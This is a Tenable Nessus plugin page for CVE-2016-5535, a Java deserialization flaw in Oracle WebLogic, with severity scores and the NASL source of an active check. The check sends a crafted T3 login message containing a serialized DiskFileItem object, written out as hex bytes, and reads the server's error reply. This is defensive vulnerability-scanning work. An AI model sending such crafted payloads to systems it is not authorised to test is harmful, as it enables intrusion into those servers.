nessusThis script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.WEBLOGIC_2016_5535.NASL
HistoryNov 03, 2016 - 12:00 a.m.

Oracle WebLogic Server Java Object Deserialization RCE (October 2016 CPU)

2016-11-0300:00:00
This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.
www.tenable.com

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

0.102 Low

EPSS

Percentile

95.0%

The remote Oracle WebLogic server is affected by a remote code execution vulnerability in the WLS Security component due to unsafe deserialization of unauthenticated Java objects passed to the Apache Commons File Upload library. An unauthenticated, remote attacker can exploit this, via a crafted DiskFileItem object, to execute arbitrary code in the context of the WebLogic server.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

# Plugin registration. This branch only declares metadata (ids, references,
# CVSS vectors, dependencies) and exits before the active check below runs.
if (description)
{
  script_id(94511);
  script_version("1.12");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");

  script_cve_id("CVE-2016-5535");
  script_bugtraq_id(93692);
  script_xref(name:"TRA", value:"TRA-2016-33");
  script_xref(name:"ZDI", value:"ZDI-16-572");

  script_name(english:"Oracle WebLogic Server Java Object Deserialization RCE (October 2016 CPU)");

  script_set_attribute(attribute:"synopsis", value:
"The remote Oracle WebLogic server is affected by a remote code
execution vulnerability.");
  script_set_attribute(attribute:"description", value:
"The remote Oracle WebLogic server is affected by a remote code
execution vulnerability in the WLS Security component due to unsafe
deserialize calls of unauthenticated Java objects to the Apache
Commons File Upload library. An unauthenticated, remote attacker can
exploit this, via a crafted a DiskFileItem object, to execute
arbitrary code in the context of the WebLogic server.");
  # http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?bac902d5");
  # https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?9c6d83db");
  script_set_attribute(attribute:"see_also", value:"https://www.tenable.com/security/research/tra-2016-33");
  script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-16-572/");
  script_set_attribute(attribute:"solution", value:
"Apply the appropriate patch according to the October 2016 Oracle
Critical Patch Update advisory.

WebLogic 12.2.1.3 is also reported to be affected. Contact Oracle
for a solution.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2016-5535");

  # The check below actively exercises the flaw (it is not a version
  # comparison), hence exploited_by_nessus is set.
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2016/10/18");
  script_set_attribute(attribute:"patch_publication_date", value:"2016/10/18");
  script_set_attribute(attribute:"plugin_publication_date", value:"2016/11/03");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:oracle:weblogic_server");
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_end_attributes();

  # ACT_ATTACK: the plugin sends a crafted T3 login request to the target,
  # so it is typically only scheduled when the scan policy allows intrusive checks.
  script_category(ACT_ATTACK);
  script_family(english:"Web Servers");

  script_copyright(english:"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.");

  # Runs only after WebLogic/T3 detection, against the detected T3 port (default 7001).
  script_dependencies("weblogic_detect.nasl", "t3_detect.nasl");
  script_require_ports("Services/t3", 7001);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("t3.inc");

# Product name used in the not-vulnerable audit message.
appname = "Oracle WebLogic Server";

# Port of the detected T3 service (7001 if none was recorded);
# exit_on_fail makes get_service() terminate the plugin when no port is usable.
port = get_service(svc:"t3", default:7001, exit_on_fail:TRUE);

# Open the raw TCP connection and run the T3 handshake. The value handed
# back by t3_connect() is reported as the instance version further down
# (presumably the version string from the T3 greeting -- confirm in t3.inc).
sock = open_sock_tcp(port);
if (!sock)
{
  audit(AUDIT_SOCK_FAIL, port);
}
version = t3_connect(sock:sock, port:port);

# Send the ident request first so the server is ready for a login message.
t3_send_ident_request(sock:sock, port:port);

# Build the "login request": a T3 message whose serialized class-table section
# carries an org.apache.commons.fileupload.disk.DiskFileItem in place of the
# weblogic.rjvm.ClassTableEntry the server expects. The bytes are sent
# verbatim; only the server's reply (checked below) decides the result.
auth_request = '\x05\x65\x08\x00\x00\x00\x01\x00\x00\x00\x1b\x00\x00\x00\x5d\x01\x01\x00\x73\x72\x01\x78\x70\x73\x72\x02\x78\x70\x00\x00\x00\x00\x00\x00\x00\x00\x75\x72\x03\x78\x70\x00\x00\x00\x00\x78\x74\x00\x08\x77\x65\x62\x6c\x6f\x67\x69\x63\x75\x72\x04\x78\x70\x00\x00\x00\x0c\x9c\x97\x9a\x9a\x8c\x9a\x9b\xcf\xcf\x9b\x93\x9a\x74\x00\x08\x77\x65\x62\x6c\x6f\x67\x69\x63\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x02\x5b\x42\xac\xf3\x17\xf8\x06\x08\x54\xe0\x02\x00\x00\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x10\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x56\x65\x63\x74\x6f\x72\xd9\x97\x7d\x5b\x80\x3b\xaf\x01\x03\x00\x03\x49\x00\x11\x63\x61\x70\x61\x63\x69\x74\x79\x49\x6e\x63\x72\x65\x6d\x65\x6e\x74\x49\x00\x0c\x65\x6c\x65\x6d\x65\x6e\x74\x43\x6f\x75\x6e\x74\x5b\x00\x0b\x65\x6c\x65\x6d\x65\x6e\x74\x44\x61\x74\x61\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00';
# this is an org.apache.commons.fileupload.disk.DiskFileItem object that should not
# be deserializable if the vulnerability was fixed
auth_request += '\xac\xed\x00\x05\x73\x72\x00\x2f\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x66\x69\x6c\x65\x75\x70\x6c\x6f\x61\x64\x2e\x64\x69\x73\x6b\x2e\x44\x69\x73\x6b\x46\x69\x6c\x65\x49\x74\x65\x6d\x1f\x0d\x72\x26\x83\x9a\x88\x71\x03\x00\x0a\x5a\x00\x0b\x69\x73\x46\x6f\x72\x6d\x46\x69\x65\x6c\x64\x4a\x00\x04\x73\x69\x7a\x65\x49\x00\x0d\x73\x69\x7a\x65\x54\x68\x72\x65\x73\x68\x6f\x6c\x64\x5b\x00\x0d\x63\x61\x63\x68\x65\x64\x43\x6f\x6e\x74\x65\x6e\x74\x74\x00\x02\x5b\x42\x4c\x00\x0b\x63\x6f\x6e\x74\x65\x6e\x74\x54\x79\x70\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x08\x64\x66\x6f\x73\x46\x69\x6c\x65\x74\x00\x0e\x4c\x6a\x61\x76\x61\x2f\x69\x6f\x2f\x46\x69\x6c\x65\x3b\x4c\x00\x09\x66\x69\x65\x6c\x64\x4e\x61\x6d\x65\x71\x00\x7e\x00\x02\x4c\x00\x08\x66\x69\x6c\x65\x4e\x61\x6d\x65\x71\x00\x7e\x00\x02\x4c\x00\x07\x68\x65\x61\x64\x65\x72\x73\x74\x00\x2f\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x66\x69\x6c\x65\x75\x70\x6c\x6f\x61\x64\x2f\x46\x69\x6c\x65\x49\x74\x65\x6d\x48\x65\x61\x64\x65\x72\x73\x3b\x4c\x00\x0a\x72\x65\x70\x6f\x73\x69\x74\x6f\x72\x79\x71\x00\x7e\x00\x03\x78\x70\x00\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x75\x72\x00\x02\x5b\x42\xac\xf3\x17\xf8\x06\x08\x54\xe0\x02\x00\x00\x78\x70\x00\x00\x00\x00\x74\x00\x02\x68\x69\x70\x71\x00\x7e\x00\x08\x71\x00\x7e\x00\x08\x70\x70\x78';
# Trailing service-context / MethodDescriptor section naming the
# authenticate(Lweblogic.security.acl.UserInfo;) call the message pretends to make.
auth_request += '\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x25\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x49\x6d\x6d\x75\x74\x61\x62\x6c\x65\x53\x65\x72\x76\x69\x63\x65\x43\x6f\x6e\x74\x65\x78\x74\xdd\xcb\xa8\x70\x63\x86\xf0\xba\x0c\x00\x00\x78\x72\x00\x29\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6d\x69\x2e\x70\x72\x6f\x76\x69\x64\x65\x72\x2e\x42\x61\x73\x69\x63\x53\x65\x72\x76\x69\x63\x65\x43\x6f\x6e\x74\x65\x78\x74\xe4\x63\x22\x36\xc5\xd4\xa7\x1e\x0c\x00\x00\x78\x70\x77\x02\x06\x00\x73\x72\x00\x26\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6d\x69\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x4d\x65\x74\x68\x6f\x64\x44\x65\x73\x63\x72\x69\x70\x74\x6f\x72\x12\x48\x5a\x82\x8a\xf7\xf6\x7b\x0c\x00\x00\x78\x70\x77\x34\x00\x2eauthenticate\x28\x4c\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x73\x65\x63\x75\x72\x69\x74\x79\x2e\x61\x63\x6c\x2eUserInfo\x3b\x29\x00\x00\x00\x1b\x78\x78\xfe\x00\xff';
send_t3(sock:sock, data:auth_request);

# Collect the server's reply to the bogus login; nothing else is sent, so
# the socket can be released right away.
return_val = recv_t3(sock:sock);
close(sock);

# A fixed server rejects the DiskFileItem before it is deserialized, so the
# cast-failure text only appears when the object was actually processed.
# No reply, or a reply without that text, is treated as not vulnerable.
cast_error = "org.apache.commons.fileupload.disk.DiskFileItem cannot be cast to weblogic.rjvm.ClassTableEntry";
if (isnull(return_val) || cast_error >!< return_val)
{
  audit(AUDIT_INST_VER_NOT_VULN, appname, version);
}

# Same report text as before, assembled in one literal.
report = '\nNessus was able to exploit a Java deserialization vulnerability by\nsending a crafted Java object.\n';
security_report_v4(port:port, severity:SECURITY_HOLE, extra:report);
VendorProductVersionCPE
oracleweblogic_servercpe:/a:oracle:weblogic_server

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

0.102 Low

EPSS

Percentile

95.0%
